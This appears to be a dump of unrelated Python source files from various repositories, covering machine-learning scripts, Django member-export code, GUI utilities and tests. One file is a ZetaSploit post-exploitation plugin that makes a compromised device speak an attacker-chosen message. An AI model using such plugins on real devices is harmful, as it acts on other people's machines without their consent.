self.assertEqual(segment[20, 30], b) # Access by coordinates
self.assertEqual(segment[2], c) # Access by index
self.assertEqual(segment[100, 100], None) # Accessing a missing point
def test_append(self):
a = Point(10, 20)
b = Point(20, 30)
c = Point(30, 40)
segment = Segment([a, b, c])
segment.append(Point(31, 40))
# Working case
self.assertEqual(segment.end, Point(31, 40))
# Point is too far
with self.assertRaises(ValueError) as context:
segment.append(Point(100, 100))
# Point already exists
with self.assertRaises(ValueError) as context:
segment.append(Point(31, 40))
def test_angle(self):
angle_1 = Segment([Point(0, 0), Point(10, 10)]) # Angle is 45°
angle_2 = Segment([Point(0, 0), Point(10, 20)]) # Angle is arctan(20/10)
angle_half = Segment([Point(0, 0), Point(20, 10)]) # Angle is arctan(10/20)
angle_vertical = Segment([Point(0, 0), Point(10, 0)]) # Angle is 0°
angle_horizontal = Segment([Point(0, 0), Point(0, 10)]) # Angle is 90°
self.assertAlmostEqual(angle_1.angle(radians = True), np.pi / 4)
self.assertAlmostEqual(angle_half.angle(radians = True), np.arctan(2))
self.assertAlmostEqual(angle_horizontal.angle(radians = True), 0)
self.assertAlmostEqual(angle_vertical.angle(radians = True), np.pi / 2)
self.assertAlmostEqual(angle_1.angle(radians = False), 45)
self.assertAlmostEqual(angle_half.angle(radians = False), 63, places = 0)
self.assertAlmostEqual(angle_horizontal.angle(radians = False), 0)
self.assertAlmostEqual(angle_vertical.angle(radians = False), 90) | 3.171875 | 3 |
EfficientNet-Transfer-Learning-Boiler-Plate/model_retrain_remove_layer.py | ntedgi/deep-learning-data-preparation-tools | 0 | 12786812 | import efficientnet.keras as efn
import os
from keras.layers import *
from keras.models import Model
from keras.preprocessing.image import ImageDataGenerator
# load checkpoint
def get_efficentnet_check_point(argument):
check_points = {
0: efn.EfficientNetB0(weights='imagenet'),
1: efn.EfficientNetB1(weights='imagenet'),
2: efn.EfficientNetB2(weights='imagenet'),
3: efn.EfficientNetB3(weights='imagenet'),
4: efn.EfficientNetB4(weights='imagenet'),
5: efn.EfficientNetB5(weights='imagenet'),
6: efn.EfficientNetB6(weights='imagenet'),
7: efn.EfficientNetB7(weights='imagenet')
}
return check_points.get(argument, "Invalid month")
experiment_name = "test5_7"
data_dir = "test2"
working_dir = "/home/naor/projects/Image-Recognition"
model_name = f'{experiment_name}.h5'
train_data_input_folder = f'{working_dir}/{data_dir}/train/'
validation_data_input_folder = f'{working_dir}/test1/val/'
model_output_dir = f'{working_dir}/models'
model_output_path = f'{model_output_dir}/{model_name}'
if not os.path.exists(model_output_dir):
os.mkdir(model_output_dir)
# input dimension for current check point
input_dim = 600
model = efn.EfficientNetB7()
# remove last layer
model.layers.pop()
model.summary()
layer = Dense(5, activation='sigmoid', name='new_layer')(model.get_layer('avg_pool').output)
new_model = Model(model.input, layer)
# create new output layer
output_layer = Dense(5, activation='sigmoid', name='output')(new_model.get_layer('new_layer').output)
#
new_model = Model(model.input, output_layer)
# lock previous weights
for i, l in enumerate(new_model.layers):
if i < 228:
l.trainable = False
# new_model.compile(loss='sparse_categorical_crossentropy', optimizer='adam')
new_model.compile(loss='mean_squared_error', optimizer='adam')
# generate train data
train_datagen = ImageDataGenerator(
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True,
validation_split=0)
train_generator = train_datagen.flow_from_directory(
train_data_input_folder,
target_size=(input_dim, input_dim),
batch_size=8,
class_mode='categorical',
seed=2019,
subset='training')
validation_generator = train_datagen.flow_from_directory(
validation_data_input_folder,
target_size=(input_dim, input_dim),
batch_size=4,
class_mode='categorical',
seed=2019,
subset='validation')
new_model.fit_generator(
train_generator,
samples_per_epoch=2000 // 32,
epochs=40,
validation_steps=20,
validation_data=validation_generator,
nb_worker=24)
new_model.save(model_output_path)
| 2.53125 | 3 |
tests/test_exception.py | AustinScola/illud | 1 | 12786813 | <filename>tests/test_exception.py<gh_stars>1-10
"""Test illud.exception."""
from illud.exception import IlludException
def test_inheritance() -> None:
"""Test illud.exception.IlludException inheritance."""
assert issubclass(IlludException, Exception)
| 1.914063 | 2 |
slugifile/slugifile.py | codehutlabs/slugifile | 0 | 12786814 | # -*- coding: utf-8 -*-
from slugify import slugify
import os
"""Main module."""
def ascii_safe_filename(filename: str) -> dict:
file = os.path.splitext(filename)
slug = slugify(file[0], separator="_")
ext = file[1]
return {"f_in": filename, "f_out": "{}{}".format(slug, ext)}
def slugifile_directory(path: str):
success = True
messages = []
if path is None:
success = False
messages.append("No path specified. Done.")
else:
path = path.rstrip("\\/")
if not os.path.isdir(path):
success = False
messages.append("Path specified is not a directory. Done.")
else:
filenames = os.listdir(path)
for filename in filenames:
result = ascii_safe_filename(filename)
f_in = result["f_in"]
f_out = result["f_out"]
if f_in == f_out:
messages.append("Skipping: {}".format(f_in))
continue
filename_in = "{}/{}".format(path, f_in)
filename_out = "{}/{}".format(path, f_out)
messages.append("Renaming: {} => {}".format(f_in, f_out))
os.rename(filename_in, filename_out)
return {"success": success, "messages": messages}
| 3.015625 | 3 |
dps/admin.py | takeflight/django-dps | 0 | 12786815 | <reponame>takeflight/django-dps<filename>dps/admin.py
from django.contrib.admin import SimpleListFilter
from django.contrib import admin
from django.contrib.contenttypes.admin import GenericTabularInline
from .models import Transaction
class ContentTypeFilter(SimpleListFilter):
title = 'purchase type'
parameter_name = 'type'
def lookups(self, request, model_admin):
ctypes = Transaction.objects.values_list(
'content_type__id', 'content_type__app_label',
'content_type__model') \
.order_by('content_type__id').distinct()
return [(c[0], (u"%s: %s" % c[1:]).title()) for c in ctypes]
def queryset(self, request, queryset):
if self.value():
return queryset.filter(content_type__id__exact=self.value())
else:
return queryset
class TransactionAdmin(admin.ModelAdmin):
list_display = ('amount', 'status', 'transaction_type',
'content_object', 'created',)
search_fields = ('secret', )
list_filter = (ContentTypeFilter, )
class TransactionInlineAdmin(GenericTabularInline):
model = Transaction
def has_add_permission(self, request):
return False
admin.site.register(Transaction, TransactionAdmin)
| 2.09375 | 2 |
ldb/export.py | bramvankooten/dienst2 | 1 | 12786816 | <gh_stars>1-10
import csv
import operator
import re
from functools import reduce
from io import StringIO
from django.db.models import Q
from django.utils.encoding import smart_str
from rest_framework import renderers, status
from rest_framework.renderers import TemplateHTMLRenderer
from rest_framework.response import Response
from rest_framework.views import APIView
from six import iteritems
from ldb.models import *
class CSVRenderer(renderers.BaseRenderer):
media_type = "text/csv"
format = "csv"
def render(self, data, media_type=None, renderer_context=None):
if not isinstance(data, list):
return data
if len(data) < 1:
return "Geen resultaten"
order = [
"name",
"streetnumber",
"postcodecity",
"kixcode",
"street_name",
"house_number",
"address_2",
"address_3",
"postcode",
"city",
"country",
"email",
"phone_fixed",
"organization__name_prefix",
"organization__name",
"organization__name_short",
"organization__salutation",
"person__titles",
"person__initials",
"person__firstname",
"person__preposition",
"person__surname",
"person__postfix_titles",
"person__phone_mobile",
"person__gender",
"person__birthdate",
"person__email_forward",
"person__ldap_username",
"person__netid",
"person__student__study",
"person__student__first_year",
"person__student__student_number",
"person__student__enrolled",
"person__student__emergency_name",
"person__student__emergency_phone",
"person__alumnus__study",
"person__alumnus__study_first_year",
"person__alumnus__study_last_year",
"person__alumnus__work_company",
"id",
]
fields = list(data[0]._data.keys())
fields.sort(key=lambda p: order.index(p))
raw_data = StringIO()
writer = csv.DictWriter(raw_data, fieldnames=fields, quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
for obj in data:
writer.writerow({k: smart_str(v) for k, v in obj._data.items()})
return raw_data.getvalue()
class ExportObject(object):
def __init__(self, initial=None):
self.__dict__["_data"] = {}
if hasattr(initial, "items"):
self.__dict__["_data"] = initial
def __getattr__(self, name):
return self._data.get(name, None)
def __setattr__(self, name, value):
self.__dict__["_data"][name] = value
def to_dict(self):
return self._data
def flatten(infile):
output = []
for obj in infile:
fields = infile.get(obj)
if obj == "entity":
output += fields
else:
for field in fields:
output.append("%s__%s" % (obj, field))
return output
class Export(APIView):
renderer_classes = (TemplateHTMLRenderer, CSVRenderer)
def get(self, request):
data = {"title": "Ledendatabase", "ng_app": "ldb"}
return Response(data, template_name="ldb/export.html")
# Fields
allowed_fields = {
"entity": [
"street_name",
"house_number",
"address_2",
"address_3",
"postcode",
"city",
"country",
"email",
"phone_fixed",
],
"organization": ["name_prefix", "name", "name_short", "salutation"],
"person": [
"titles",
"initials",
"firstname",
"preposition",
"surname",
"postfix_titles",
"phone_mobile",
"gender",
"birthdate",
"email_forward",
"ldap_username",
"netid",
],
"person__member": [],
"person__student": [
"study",
"first_year",
"student_number",
"enrolled",
"emergency_name",
"emergency_phone",
],
"person__alumnus": [
"study",
"study_first_year",
"study_last_year",
"work_company",
],
"person__employee": [],
}
def set_fields(self, query):
allowed_fields = flatten(self.allowed_fields)
requested_fields = query.get("fields", [])
fields = {}
for k, v in iteritems(requested_fields):
if v:
fields[k] = v
requested_fields = fields
export_fields = list(set(allowed_fields) & set(requested_fields))
if len(export_fields) == 0:
export_fields = ["id"]
return export_fields
# Querysets
living_person = Q(~Q(person__isnull=True), Q(person__deceased=False))
allowed_querysets = {
"organizations": Q(~Q(organization__isnull=True)),
"members": Q(
living_person,
Q(person__member__date_from__isnull=False),
Q(person__member__date_to__isnull=True)
| Q(person__member__date_to__gt=date.today()),
),
"merit": Q(living_person, ~Q(person__member__merit_date_from__isnull=True)),
"honorary": Q(
living_person, ~Q(person__member__honorary_date_from__isnull=True)
),
"students": Q(living_person, ~Q(person__student__isnull=True)),
"alumni": Q(living_person, ~Q(person__alumnus__isnull=True)),
"employees": Q(living_person, ~Q(person__employee__isnull=True)),
}
def set_querysets(self, query):
requested_querysets = query.get("queryset", [])
querysets = {}
for k, v in iteritems(requested_querysets):
if v == True:
querysets[k] = v
requested_querysets = querysets
export_querysets = list(set(self.allowed_querysets) & set(requested_querysets))
return export_querysets
# Filters
allowed_filters = {
"entity": [
"country",
"machazine",
"board_invites",
"constitution_card",
"christmas_card",
"yearbook",
],
"organization": [],
"person": ["mail_announcements", "mail_company", "mail_education"],
"person__member": ["associate_member", "donating_member", "merit_invitations"],
"person__student": ["first_year", "enrolled", "yearbook_permission"],
"person__alumnus": [],
"person__employee": [],
}
def set_filters(self, query):
export_filters = {}
allowed_filters = flatten(self.allowed_filters)
requested_filters = query.get("filters", [])
for field in requested_filters:
if field in allowed_filters:
value = requested_filters.get(field)
if value == "true":
export_filters[field] = True
elif value == "false":
export_filters[field] = False
elif value != "undefined":
export_filters[field] = value
return export_filters
def post(self, request):
querysets = self.set_querysets(request.data)
if not querysets:
return Response("No groups selected", status=status.HTTP_400_BAD_REQUEST)
objects = Entity.objects.filter(
reduce(
operator.or_, map(lambda x: self.allowed_querysets.get(x), querysets)
)
)
filters = self.set_filters(request.data)
objects = objects.filter(**filters)
addresslist = request.data.get("addresslist", "off")
if addresslist == "off":
export_fields = self.set_fields(request.data)
objects = objects.values(*export_fields)
converted = list(map(ExportObject, objects))
elif addresslist in ["doubles", "living_with"]:
objects = objects.filter(~Q(street_name=""), ~Q(house_number="")).values(
"street_name",
"house_number",
"address_2",
"address_3",
"postcode",
"city",
"organization__name_prefix",
"organization__name",
"organization__name_short",
"organization__salutation",
"person__titles",
"person__initials",
"person__firstname",
"person__preposition",
"person__surname",
"person__postfix_titles",
"person__living_with",
"person__gender",
"id",
)
def getname(obj):
if obj.get("organization__name"):
name = obj.get("organization__name_prefix", "")
name += " "
name += obj.get("organization__name")
name = re.sub("\s+", " ", name)
return name.strip()
elif obj.get("person__surname"):
titles = obj.get("person__titles")
if titles:
firstname = "%s %s" % (
titles,
obj.get(
"person__initials", obj.get("person__firstname", "")
),
)
else:
firstname = obj.get(
"person__firstname", obj.get("person__initials", "")
)
name = "%s %s %s %s" % (
firstname,
obj.get("person__preposition", ""),
obj.get("person__surname", ""),
obj.get("person__postfix_titles", ""),
)
name = re.sub("\s+", " ", name)
return name.strip()
else:
return ""
if addresslist == "living_with":
doubles = {}
others = []
for obj in objects:
if obj.get("person__living_with"):
if doubles.get(obj["person__living_with"]):
other = doubles[obj["person__living_with"]]
if obj.get("person__gender") == "M":
obj["combined_name"] = "%s en %s" % (
getname(obj),
getname(other),
)
else:
obj["combined_name"] = "%s en %s" % (
getname(other),
getname(obj),
)
others.append(obj)
else:
doubles[obj["id"]] = obj
else:
others.append(obj)
objects = others
def format(obj):
converted_obj = {}
converted_obj["streetnumber"] = "%s %s" % (
obj.get("street_name"),
obj.get("house_number"),
)
postcode = obj.get("postcode").replace(" ", "")
converted_obj["postcodecity"] = "%s %s" % (postcode, obj.get("city"))
converted_obj["kixcode"] = "%s%s" % (postcode, obj.get("house_number"))
converted_obj["name"] = obj.get("combined_name", getname(obj))
return ExportObject(converted_obj)
converted = list(map(format, objects))
converted.sort(key=lambda p: p.kixcode)
return Response(converted)
| 2.0625 | 2 |
filemon/files.py | asvetlov/filemon | 0 | 12786817 | import os
import sys
import subprocess
from PySide import QtGui, QtCore
class FileSystemModel(QtGui.QFileSystemModel):
filter_reset = QtCore.Signal()
root_index_changed = QtCore.Signal(QtCore.QModelIndex)
status_changed = QtCore.Signal(int, int)
STORAGE_NAME = '.filemon.dat'
def __init__(self):
QtGui.QFileSystemModel.__init__(self)
self.setFilter(QtCore.QDir.AllDirs |
QtCore.QDir.NoDot |
QtCore.QDir.NoDotDot |
QtCore.QDir.AllEntries |
QtCore.QDir.DirsFirst |
QtCore.QDir.Name)
self._processed = set()
self._marked_count = 0
self._total_count = 0
self.setNameFilterDisables(False)
self.directoryLoaded.connect(self._update_stats)
def _update_stats(self):
files = self._files()
print(files, self._processed)
self._marked_count = sum(1 for f in files if f in self._processed)
self._total_count = len(files)
self.status_changed.emit(self._total_count, self._marked_count)
@QtCore.Slot(str)
def filter_changed(self, text):
print('filter changed', text)
text = text.strip()
if text:
self.setNameFilters(['*' + text + '*'])
else:
self.setNameFilters([])
self._update_stats()
def _files(self):
ret = []
idx = self.index(self.rootPath())
for i in range(0, self.rowCount(idx)):
child = idx.child(i, idx.column())
ret.append(self.fileName(child))
return ret
def set_path(self, path):
print(path)
path = os.path.abspath(path)
self.reset()
self.setRootPath(path)
self.filter_reset.emit()
self.root_index_changed.emit(self.index(path))
storage = os.path.join(path, self.STORAGE_NAME)
self._processed = set()
present = set(os.listdir(path))
if os.path.isfile(storage):
with open(storage) as f:
data = set(f.read().splitlines())
self._processed = data - present
if data != self._processed:
self._save()
self._update_stats()
@QtCore.Slot()
def go_parent(self):
path = self.rootPath()
self.set_path(path + '/..')
@QtCore.Slot()
def go_home(self):
path = os.path.expanduser('~')
self.set_path(path)
@QtCore.Slot()
def go_cwd(self):
self.set_path(os.getcwd())
def file_dragged(self, path):
print("Dragged", path)
self._processed.add(path)
self._save()
def _save(self):
self._update_stats()
storage = os.path.join(self.rootPath(), self.STORAGE_NAME)
with open(storage, 'w') as f:
f.write('\n'.join(sorted(self._processed)))
def data(self, index, role):
if index.isValid() and role == QtCore.Qt.ForegroundRole:
path = self.filePath(index)
if path in self._processed:
return QtGui.QBrush(QtGui.QColor(255, 0, 0))
return super().data(index, role)
@QtCore.Slot()
def reset_markers(self):
self._processed = set()
self._save()
self.set_path(self.rootPath())
def unmark(self, index):
if not index.isValid():
return
path = self.filePath(index)
self._processed.discard(path)
self._save()
self.set_path(self.rootPath())
def start_file(self, index):
filename = self.fileName(index)
if sys.platform == "win32":
os.startfile(filename)
else:
opener = "open" if sys.platform == "darwin" else "xdg-open"
subprocess.call([opener, filename])
class FileView(QtGui.QListView):
def __init__(self, parent):
QtGui.QListView.__init__(self, parent)
self.setDragEnabled(True)
def mousePressEvent(self, event):
if event.button() == QtCore.Qt.LeftButton:
self._drag_start_pos = event.pos()
return QtGui.QListView.mousePressEvent(self, event)
def mouseMoveEvent(self, event):
if not event.buttons() & QtCore.Qt.LeftButton:
return
if ((event.pos() - self._drag_start_pos).manhattanLength() <
QtGui.QApplication.startDragDistance()):
return
model = self.model()
drag = QtGui.QDrag(self)
index = self.indexAt(self._drag_start_pos)
if not index.isValid():
return
if model.isDir(index):
return
path = model.filePath(index)
mimedata = model.mimeData([index])
drag.setMimeData(mimedata)
drop_action = drag.exec_(QtCore.Qt.CopyAction)
if drop_action == QtCore.Qt.CopyAction:
model.file_dragged(path)
| 2.375 | 2 |
08-recursive-and-backtracking/leetcode_22.py | xiaolinzi-xl/Algorithm-Interview-Study | 1 | 12786818 | ans = []
def rebot(l, r, n, res):
if l == n and r == n:
ans.append(res)
return
if l > r:
if l < n:
rebot(l + 1, r, n, res + '(')
rebot(l, r + 1, n, res + ')')
elif l == r:
rebot(l + 1, r, n, res + '(')
class Solution:
def generateParenthesis(self, n):
ans.clear()
rebot(1, 0, n, '(')
return ans
| 3.359375 | 3 |
manifold_flow/flows/flow.py | selflein/manifold-flow | 199 | 12786819 | <reponame>selflein/manifold-flow
import logging
from manifold_flow.utils.various import product
from manifold_flow import distributions
from manifold_flow.flows import BaseFlow
logger = logging.getLogger(__name__)
class Flow(BaseFlow):
""" Ambient normalizing flow (AF) """
def __init__(self, data_dim, transform):
super(Flow, self).__init__()
self.data_dim = data_dim
self.latent_dim = data_dim
self.total_data_dim = product(data_dim)
self.total_latent_dim = product(self.latent_dim)
self.latent_distribution = distributions.StandardNormal((self.total_latent_dim,))
self.transform = transform
self._report_model_parameters()
def forward(self, x, context=None):
""" Transforms data point to latent space, evaluates log likelihood """
# Encode
u, log_det = self._encode(x, context=context)
# Decode
x = self.decode(u, context=context)
# Log prob
log_prob = self.latent_distribution._log_prob(u, context=None)
log_prob = log_prob + log_det
return x, log_prob, u
def encode(self, x, context=None):
""" Encodes data point to latent space """
u, _ = self._encode(x, context=context)
return u
def decode(self, u, context=None):
""" Encodes data point to latent space """
x, _ = self.transform.inverse(u, context=context)
return x
def log_prob(self, x, context=None):
""" Evaluates log likelihood """
# Encode
u, log_det = self._encode(x, context)
# Log prob
log_prob = self.latent_distribution._log_prob(u, context=None)
log_prob = log_prob + log_det
return log_prob
def sample(self, u=None, n=1, context=None):
""" Generates samples from model """
if u is None:
u = self.latent_distribution.sample(n, context=None)
x = self.decode(u, context=context)
return x
def _encode(self, x, context=None):
u, log_det = self.transform(x, context=context)
return u, log_det
| 2.46875 | 2 |
InvoiceSystem-python/paymentCharged.py | gvensan/ep-design-workshop | 0 | 12786820 | <reponame>gvensan/ep-design-workshop
from enum import Enum
from typing import Sequence
from entity import Entity
class PaymentCharged(Entity):
class Driver(Entity):
def __init__(
self,
driverId: int,
rating: int,
lastName: str,
carClass: str,
firstName: str):
self.driverId = driverId
self.rating = rating
self.lastName = lastName
self.carClass = carClass
self.firstName = firstName
class Passenger(Entity):
def __init__(
self,
passengerId: int,
rating: int,
lastName: str,
firstName: str):
self.passengerId = passengerId
self.rating = rating
self.lastName = lastName
self.firstName = firstName
def __init__(
self,
entityType: str,
rideId: str,
amountCharged: float,
driver: Driver,
paymentChargedId: str,
passenger: Passenger,
paymentStatus: str,
invoiceSystemId: str,
informationSource: str,
timestamp: str):
self.entityType = entityType
self.rideId = rideId
self.amountCharged = amountCharged
self.driver = driver
self.paymentChargedId = paymentChargedId
self.passenger = passenger
self.paymentStatus = paymentStatus
self.invoiceSystemId = invoiceSystemId
self.informationSource = informationSource
self.timestamp = timestamp
| 2.984375 | 3 |
plugins/zeterpreter/multi/trolling/say.py | CrackerCat/ZetaSploit | 3 | 12786821 | #!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
from core.badges import badges
class ZetaSploitPlugin:
def __init__(self, controller):
self.controller = controller
self.badges = badges()
self.details = {
'Name': "multi/trolling/say",
'Authors': ['enty8080'],
'Description': "Say text message on device.",
'Comment': "idk?"
}
self.options = {
'MESSAGE': {
'Description': "Message to say.",
'Value': "Hello, zeterpreter!",
'Required': True
}
}
def run(self):
status, output = self.controller.send_command("say", self.options['MESSAGE']['Value'])
if status == "error":
print(self.badges.E + "Failed to say message!") | 1.90625 | 2 |
storage/baidu_cloud.py | wangkaibiao/SettlersFinancialData3 | 0 | 12786822 | <reponame>wangkaibiao/SettlersFinancialData3
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
bypy,第一次运行时需要授权,只需跑任何一个命令(比如 bypy info)然后跟着说明(登陆等)来授权即可。
授权只需一次,一旦成功,以后不会再出现授权提示.
更详细的了解某一个命令:bypy help <command>
显示在云盘(程序的)根目录下文件列表:bypy list
把当前目录同步到云盘:bypy syncup or bypy upload
把云盘内容同步到本地来:bypy syncdown or bypy downdir /
比较本地当前目录和云盘(程序的)根目录(个人认为非常有用):bypy compare
更多命令和详细解释请见运行bypy的输出。
调试
运行时添加-v参数,会显示进度详情。
运行时添加-d,会显示一些调试信息。
运行时添加-ddd,还会会显示HTTP通讯信息(警告:非常多)
经验分享,请移步至wiki,方便分享/交流。
"""
from bypy import ByPy#,gui
import os,sys,psutil
from service import png
"""-------------------------------------------------------------------------"""
_paths=["/media/sfd/1CEE36D0EE36A1C6/core/","/media/sfd/LENOVO/SFD_assistant/core/"]
for _path in _paths:
if os.path.exists(_path):
base_path=_path
externalPaths=[base_path + 'basic_linux' ,
base_path + 'intelligent_device' ,
base_path + 'knowledge_continue' ,
]
#os.listdir(externalPaths[0])
"""-------------------------------------------------------------------------"""
def make_paths(paths=[]):#用于初始化开发环境
if paths:
for path in paths:
if not os.path.exists(path):
os.makedirs(path)
return "创建成功"
else:
return "请输入路径列表"
#make_paths(externalPaths)
"""-------------------------------------------------------------------------"""
def test():
bp=ByPy()
bp.list("basic_linux/") # or whatever instance methods of ByPy class
bp.syncup(base_path)
bp.syndown("/apps/bypy",base_path)
bp.downfile("basic_linux/wps-office_10.1.0.6634_amd64.deb",externalPaths[0])
bp.downfile("basic_linux/can_google.crx",externalPaths[0])
#gui.BypyGui()
"""-------------------------------------------------------------------------"""
def qpython_sync(current_dir="/*/",file_name="*.py"):
move_path="/run/user/1000/gvfs/mtp:host=%5Busb%3A001%2C002%5D/Internal storage/qpython"
sourceFile=os.getcwd()+"/storage/emulated/0/qpython"+current_dir+file_name
targetFile=move_path+current_dir+file_name
if os.path.isfile(sourceFile):
with open(sourceFile, "rb") as source:
with open(targetFile, "wb") as copy:
copy.write(source.read())
print("copy success")
| 1.84375 | 2 |
kbsbot/channel_handler/services.py | astandre/cb-channel-handler-ms | 0 | 12786823 | <reponame>astandre/cb-channel-handler-ms
from requests import Session
import requests
import os
COMPOSE_ENGINE = os.environ.get('COMPOSE_ENGINE')
# COMPOSE_ENGINE = "http://127.0.0.1:5000"
session = Session()
session.trust_env = False
session.verify = False
session.headers["Accept"] = "application/json"
session.headers["Content-Type"] = "application/json"
def compose(data):
"""
This method connects to the compose engine in order to get the answer for the user.
Args:
:param data: A dict containing data to pass to the engine. This dict contains, the user id, the agent, the context and the user input.
Returns:
A dict containing the context and the answer for the user.
"""
url = COMPOSE_ENGINE + "/compose"
try:
r = session.get(url, json=data)
if r.status_code == 200:
response = r.json()
print(response)
return response
except requests.exceptions.RequestException as e:
print(e)
| 2.71875 | 3 |
callables.py | StanLivitski/python-runtime | 0 | 12786824 | # vim:fileencoding=UTF-8
#
# Copyright © 2016, 2019 <NAME>
#
# Licensed under the Apache License, Version 2.0 with modifications,
# (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# https://raw.githubusercontent.com/StanLivitski/EPyColl/master/LICENSE
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Helpers for obtaining information about callable
objects and have the same code run different types of callables.
Key elements
------------
prepare_call : A function that unwraps a callable, if necessary,
and tells whether the resulting object requires the ``self``
argument to be called.
call : Calls the target object, prepending ``self``
argument if necessary.
"""
import version
version.requirePythonVersion(3, 3)
def call(callable_, globals_, self, *args, **kwargs):
"""
Calls the target object, prepending ``self`` argument to
the argument list if necessary.
Parameters
----------
callable_ : callable
Reference to a function or method object or wrapper.
globals_ : dict
The dictionary of the module defining the target callable,
or the local dictionary for the scope in which the target callable's
container is defined.
self : object | None
The value to be passed as ``self`` argument, if
required by the target.
args : collections.Iterable
Any positional arguments, excluding ``self``.
kwargs : collections.Mapping
Any keyword arguments, excluding ``self``.
Returns
-------
object | None
Any value returned by the call.
Raises
------
TypeError
If the argument is not callable or has unknown type.
BaseException
Any exception thrown by the call.
See Also
--------
prepare_call : processes the callable before making the call
"""
target, selfNeeded = prepare_call(callable_, globals_)
_args = [ self ] if selfNeeded else []
_args.extend(args)
return target(*_args, **kwargs)
def prepare_call(callable_, globals_):
"""
Unwrap method decorators applied to ``callable_`` and
tell whether the resulting object requires the ``self``
argument to be called.
Dereferences ``@staticmethod`` and ``@classmethod`` decorators
and returns a flag telling whether explicit ``self`` argument
is required. This method may be used when preparing class
definitions (e.g. decorating methods) as well as at runtime.
Parameters
----------
callable_ : callable
Reference to a function or method object or wrapper.
globals_ : dict
The dictionary of the module defining the target callable,
or the local dictionary for the scope in which the target callable's
container is defined. If the container has not yet been defined
(e.g. when processing a decorator) this mapping should also contain
its future qualified name mapped to the ``object`` type value.
Returns
-------
callable
Dereferenced callable object.
boolean
A flag telling whether explicit ``self`` argument must
be on the argument list.
Raises
------
TypeError
If the argument is not callable or has unknown type.
"""
bindable = None
if not callable(callable_) and hasattr(callable_, '__func__'):
if isinstance(callable_, staticmethod):
bindable = False
callable_ = callable_.__func__
if not callable(callable_):
raise TypeError('Argument of type %s is not callable' % type(callable_).__name__)
if hasattr(callable_, '__self__'):
bindable = False
if bindable is None:
prefix = callable_.__qualname__[:-len(callable_.__name__)]
if prefix:
assert '.' == prefix[-1]
prefix = prefix[:-1]
try:
bindable = isinstance(eval(prefix, globals_), type)
except:
bindable = False
else:
bindable = False
return callable_, bindable
| 2.25 | 2 |
jes/jes-v4.3-linux/Sources/JESRunnable.py | utv-teaching/foundations-computer-science | 0 | 12786825 | <reponame>utv-teaching/foundations-computer-science
#JES- Jython Environment for Students
#Copyright (C) 2002 <NAME>, <NAME>, <NAME>, <NAME>
#See JESCopyright.txt for full licensing information
from java.lang import Runnable
from javax.swing import JOptionPane
################################################################################
# JESRunnable
#
# a runnable object which update the command window, displaying the new results
# from the execution of the user's code.
################################################################################
class JESRunnable( Runnable ):
######################################################################
# init
# interpreter: the JESInterpreter object that this runnable updates
# output: a string, the output from the user's code
# errRec: a JESExceptionRecord object, only defined if an excption occured.
# created from the exception information and stack trace returned
# by sys.exc_info()
######################################################################
def __init__(self,interpreter, output, errRec, mode):
self.interpreter = interpreter
self.output = output
self.mode = mode
if errRec != None:
self.errMsg = errRec.getExceptionMsg()
self.errLine = errRec.getLineNumber()
else:
self.errMsg = ''
self.errLine = None
######################################################################
# run
#
# the method that does all of the updating work.
# this method should ALWAYS be called from within the same thread
# that the GUI executes in.
######################################################################
def run(self):
if self.output != '' and self.output != None:
self.interpreter.sendOutput( self.output )
if self.errMsg != '' and self.errMsg != None:
self.interpreter.sendOutput( self.errMsg )
if self.errLine != None:
self.interpreter.program.gui.editor.showErrorLine(self.errLine)
self.interpreter.program.gui.commandWindow.restoreConsole(self.mode)
self.interpreter.program.gui.setRunning( 0 )
self.interpreter.program.gui.stopWork()
self.interpreter.program.gui.editor.document.removeLineHighlighting()
self.interpreter.program.gui.editor.editable = 1
# needed for midi note playing
import JavaMusic
try:
JavaMusic.cleanUp()
except:
menuBar = self.interpreter.program.gui.getJMenuBar()
mediaMenu = menuBar.getMenu(menuBar.getMenuCount() - 2)
if mediaMenu.getText() == 'MediaTools':
# the above is merely for sanity checking...
#if mediaMenu.getItem(0).isEnabled():
if self.interpreter.program.gui.soundErrorShown == 0:
# we don't want to keep bombarding the user with messages!
# mediaMenu.getItem(0).setEnabled(0)
self.interpreter.program.gui.soundErrorShown = 1
msg = 'Sound card initialization failed!\n\n'
msg += 'You will not be able to use this functionality during the\n'
msg += 'current session of JES. Please make sure your sound card\n'
msg += 'is not currently being used by another program and restart\n'
msg += 'JES.'
JOptionPane.showMessageDialog(self.interpreter.program.gui,
msg, 'Sound Error', JOptionPane.ERROR_MESSAGE)
if self.interpreter.debug_mode:
self.interpreter.debugger.endExecution()
| 3.15625 | 3 |
app/waterQual/30yr/CC/wrtds_WCC_err.py | fkwai/geolearn | 0 | 12786826 | <gh_stars>0
import importlib
from hydroDL.master import basins
from hydroDL.app import waterQuality
from hydroDL import kPath, utils
from hydroDL.model import trainTS
from hydroDL.data import gageII, usgs
from hydroDL.post import axplot, figplot
import torch
import os
import json
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import time
# rmCode = ['00010', '00095', '00400']
# rmName = 'rmTKH'
# rmCode = ['00010', '00095']
# rmName = 'rmTK'
rmCode = ['00010']
rmName = 'rmT'
